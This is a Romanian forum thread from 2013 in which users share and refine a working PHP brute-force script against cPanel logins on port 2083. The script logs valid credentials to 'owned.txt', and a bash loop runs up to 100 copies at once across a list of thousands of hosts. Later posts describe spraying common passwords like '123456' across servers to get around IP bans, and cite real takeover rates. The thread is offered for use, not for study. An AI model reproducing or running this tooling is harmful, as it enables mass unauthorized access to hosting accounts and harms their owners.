shop_toolz Posted July 31, 2013 Report Posted July 31, 2013 Noroc, propun urmatorul subiect de discutii:Am realizat urmatoarele chestii:brute.php:<?phperror_reporting(0);function cpanel_check($host,$user,$pass,$timeout){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://".$host.":2083"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0); curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); curl_setopt($ch, CURLOPT_USERPWD, $user.":".$pass); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); curl_setopt($ch, CURLOPT_FAILONERROR, 1); $data = curl_exec($ch); if ( curl_errno($ch) == 28 ) { return "Request Time Out"; exit; } elseif ( curl_errno($ch) == 0 ){ echo "Good: $user:$pass:$host\r\n"; if(!($_OutFile = fopen("owned.txt", "a"))) ExitF ("Cannot open the log file"); fputs($_OutFile, "$user,$pass,$host - valid login information!!!\r\n"); exit() ; } else echo "Bad: $user:$pass:$host\r\n"; curl_close($ch);}$host=$argv[1];$user=str_replace("http://","",$host);$user=str_replace("www.","",$user);$user=str_replace("-","",$user);$user=substr($user,0,8);$passwords = file_get_contents("passwords.txt");$passwords = explode("\n",$passwords);foreach ($passwords as $pass){if($pass!=""){ cpanel_check($host,$user,$pass,3);}}?>Si "metoda de multi-threading",#!/bin/bashIPFILE="cpanels.txt"cat $IPFILE | while read IP; doCMD=`ps -eaf | grep -c brute.php`if [ "$CMD" -lt "100" ]; then php brute.php $IP &else sleep 10fidoneProblema e ca nu prinde nimic. Nu gasesc o problema la el, la 3-4 cpanele bune verifica loginul, daca ii dau 2000 urluri de cpanel nu face nimic..nu inteleg de ce. Daca bag un cpanel bun in restul de urluri la fel, nu-lk ia. Quote
robertutzu Posted July 31, 2013 Report Posted July 31, 2013 eu nu inteleg brute-ul daca eu am ban pe ip dupa 3 logari gresite Quote
shop_toolz Posted July 31, 2013 Author Report Posted July 31, 2013 Dupa 6 logari gresite. Sunt foarte multe servere cu parola 123456/password/qwerty. Daca iti faci o lista cu 6 parole, prinzi binisor. In plus, am un php bruteforce single thread care aduce rezultate bune. (10-15 loginuri/500 servere cu cpanele). Quote
eusimplu Posted July 31, 2013 Report Posted July 31, 2013 eu nu inteleg brute-ul daca eu am ban pe ip dupa 3 logari gresitePartea frumoasa e cand te blocheaza 5 minute pentru o logare gresita la ftp, e asa de fun cand gresesti parola la ftp si stai 5 minute sa te uiti cum ploua afara. Quote
shop_toolz Posted July 31, 2013 Author Report Posted July 31, 2013 (edited) @eusimplu: o solutie ar fi urmatoarea. Mod de functionare://Citirea primei linii din passwords.txt (123456)//Incarcarea tuturor ipurilor.//Foreach, pentru fiecare ip se incearca parola 123456.//Citirea urmatoarei linii din passwords.txt(password)//reluarea ciclului de bruteforce..etcAsta ar rezolva in unele cazuri problema cu banip, deoarece la 10.000 servere in bruteforce ar trebui sa fie destul timp intre 2 login attempts.Am rescris functia de bruteforce si am adaugat o verificare, este cpanel sau nu. Edited July 31, 2013 by Zatarra Quote
Brenin Posted August 1, 2013 Report Posted August 1, 2013 Dupa 6 logari gresite. Sunt foarte multe servere cu parola 123456/password/qwerty. Daca iti faci o lista cu 6 parole, prinzi binisor. In plus, am un php bruteforce single thread care aduce rezultate bune. (10-15 loginuri/500 servere cu cpanele).Esti sigur de rata care ai dat-o ? 10:500 mi se pare FOARTE ingaduitoare.Daca esti sigur, si spui asta din experienta, pot sa fac eu varianta in python, in modul cum ai specificat cu incercarea parolelor. Quote